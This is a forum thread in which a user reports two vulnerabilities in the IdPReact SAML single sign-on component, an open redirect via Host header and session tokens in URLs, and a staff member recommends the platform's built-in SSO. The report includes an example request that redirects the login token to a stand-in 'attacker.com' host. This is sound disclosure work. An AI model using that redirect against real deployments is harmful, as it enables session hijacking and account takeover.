Skip to Content (Press Enter)
UserImage.jpg
Gabriele Gimelli
42Views
1Comments
Solved
[IdPReact] [IdPReact] Open Redirection via Host Header and Session token in URL Vulnerability
Question
Reactive
Forge
Security
idp-react
Reactive icon
IdPReact (O11)
Forge asset by Telmo Martins
Application Type
Reactive
Service Studio Version
11.54.18 (Build 62611)
Platform Version
11.17.0 (Build 36616)

During vulnerability testing of an application that uses the IdPReact component, we have identified 2 vulnerabilities in the IdP application used for Single Sign-On (SSO) using SAML 2.0:

  • Open Redirection via Host Header Injection leads to Account Takeover: an attacker capable of modifying the Host header within the HTTP request sent to the backend can redirect the flow of requests to an arbitrary domain. This vulnerability becomes particularly significant when a request containing the login token is made because it could be intercepted by the attacker and used to compromise the user's session.In particular, a malicious agent can capture the token of the victim user by modifying the Host header and the OriginalURL parameter in the login request, e.g. "/IdPReact/IdPLogin?Token=&OriginalURL=https://attacker.com", Sending the token to the domain "attacker.com"
  • Session token in URL: Inserting session tokens into URLs increases the risk of potential attackers gaining possession of these tokens, thereby allowing them to obtain and use a valid session for the application without having access to any credentials.Specifically, the session token is transmitted within the 'Token' parameter in the GET request to /IdPReact/IdPLogin. This could potentially compromise the session if an attacker manages to view the system log of a middleware capable of recording the requests made

Is there a way to address these 2 vulnerabilities?

Thanks in advance for your support and contribution.

Kind Regards,

Gabriele

0
0
25 Jul 2023
Copy Link
2020-10-08 19-51-35
João Barata
Staff
Solution

Hi @Gabriele Gimelli,

Thank you for reporting this.

If you are on version 11.10.0 or above, you should be able to remove the IdPReact usage altogether and instead enable the Single Sign On between app types in Service Center.

https://success.outsystems.com/documentation/11/managing_the_applications_lifecycle/secure_the_applications/configure_app_authentication/
This is in fact the recommended way to use the component. IdPReact was a temporary implementation while the above feature hadn't yet been released on the platform.

You will need to enable secure cookies in Lifetime before you are able to enable the setting above.
https://success.outsystems.com/documentation/11/developing_an_application/secure_the_application/enable_secure_session_cookies_and_set_application_cookies_as_secure/#secure-session-cookies

After enabling the setting, you will be able to use the "IdP_SSO_URL" and "IdP_SingleLogout_URL" in your reactive application directly without having to use the actions from IdPReact. 
This will also improve the end-user experience with one less redirect in the authentication flow.

In any case, I'll try to work on a way to fix the issues reported.

Regards,





1
0
25 Jul 2023
Copy Link
Community GuidelinesBe kind and respectful, give credit to the original source of content, and search for duplicates before posting.